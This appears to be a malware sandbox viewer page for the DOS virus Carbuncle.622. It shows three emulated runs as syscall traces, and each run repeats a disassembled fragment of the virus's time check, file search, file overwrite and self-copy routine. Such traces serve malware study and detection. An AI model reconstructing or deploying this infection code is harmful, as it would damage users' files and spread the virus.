Sample viewer

vx.netlux.org/Virus.DOS.Carbuncle.622

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:05.719761886Z 44 PC: 12a59 | Get time 0x12a59: cmp dh, 0x10
0x12a5c: jg 0x12a8d
0x12a5e: mov al, 5
0x12a60: mov byte ptr [0x25b], al
0x12a63: mov ah, 0x4e
0x12a65: mov dx, 0x25c
0x12a68: int 0x21
0x12a6a: jb 0x12a8d
0x12a6c: mov ax, 0x3d01
0x12a6f: mov dx, 0x9e
0x12a72: int 0x21
0x12a74: mov bh, 0x40
0x12a76: mov dx, 0x100
0x12a79: xchg ax, bx
0x12a7a: mov cl, 0x2a
0x12a7c: int 0x21
0x12a7e: mov ah, 0x3e
0x12a80: int 0x21
0x12a82: dec byte ptr [0x25b]
0x12a86: je 0x12a51
2018-12-17T23:10:05.722507246Z 60 PC: 12a97 | Create or truncate file
2018-12-17T23:10:06.639657967Z 64 PC: 12aa3 | Write file or device (Write 622 bytes on handle 5)
2018-12-17T23:10:06.809950346Z 62 PC: 12aa7 | Close file
2018-12-17T23:10:06.818279879Z 67 PC: 12ab2 | Get or set file attributes
2018-12-17T23:10:06.82960899Z 26 PC: 12ab9 | Set disk transfer address
2018-12-17T23:10:06.830692835Z 78 PC: 12ac0 | Find first file
2018-12-17T23:10:06.83979429Z 76 PC: 12a55 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16752,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:45.443651912Z 44 PC: 12a59 | Get time 0x12a59: cmp dh, 0x10
0x12a5c: jg 0x12a8d
0x12a5e: mov al, 5
0x12a60: mov byte ptr [0x25b], al
0x12a63: mov ah, 0x4e
0x12a65: mov dx, 0x25c
0x12a68: int 0x21
0x12a6a: jb 0x12a8d
0x12a6c: mov ax, 0x3d01
0x12a6f: mov dx, 0x9e
0x12a72: int 0x21
0x12a74: mov bh, 0x40
0x12a76: mov dx, 0x100
0x12a79: xchg ax, bx
0x12a7a: mov cl, 0x2a
0x12a7c: int 0x21
0x12a7e: mov ah, 0x3e
0x12a80: int 0x21
0x12a82: dec byte ptr [0x25b]
0x12a86: je 0x12a51
2018-12-25T12:53:45.446104114Z 78 PC: 12a6a | Find first file
2018-12-25T12:53:45.451789687Z 60 PC: 12a97 | Create or truncate file
2018-12-25T12:53:45.467651134Z 64 PC: 12aa3 | Write file or device (Write 622 bytes on handle 5)
2018-12-25T12:53:45.476287872Z 62 PC: 12aa7 | Close file
2018-12-25T12:53:45.484786679Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T12:53:45.494368795Z 26 PC: 12ab9 | Set disk transfer address
2018-12-25T12:53:45.495939304Z 78 PC: 12ac0 | Find first file
2018-12-25T12:53:45.505651245Z 76 PC: 12a55 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":17,"TimeBased":true,"OriginalID":16752,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:46.257307234Z 44 PC: 12a59 | Get time 0x12a59: cmp dh, 0x10
0x12a5c: jg 0x12a8d
0x12a5e: mov al, 5
0x12a60: mov byte ptr [0x25b], al
0x12a63: mov ah, 0x4e
0x12a65: mov dx, 0x25c
0x12a68: int 0x21
0x12a6a: jb 0x12a8d
0x12a6c: mov ax, 0x3d01
0x12a6f: mov dx, 0x9e
0x12a72: int 0x21
0x12a74: mov bh, 0x40
0x12a76: mov dx, 0x100
0x12a79: xchg ax, bx
0x12a7a: mov cl, 0x2a
0x12a7c: int 0x21
0x12a7e: mov ah, 0x3e
0x12a80: int 0x21
0x12a82: dec byte ptr [0x25b]
0x12a86: je 0x12a51
2018-12-25T12:53:46.259782636Z 60 PC: 12a97 | Create or truncate file
2018-12-25T12:53:46.276186322Z 64 PC: 12aa3 | Write file or device (Write 622 bytes on handle 5)
2018-12-25T12:53:46.284122619Z 62 PC: 12aa7 | Close file
2018-12-25T12:53:46.292355925Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T12:53:46.302870123Z 26 PC: 12ab9 | Set disk transfer address
2018-12-25T12:53:46.30377064Z 78 PC: 12ac0 | Find first file
2018-12-25T12:53:46.313180934Z 76 PC: 12a55 | Terminate with return code (Return code = '18')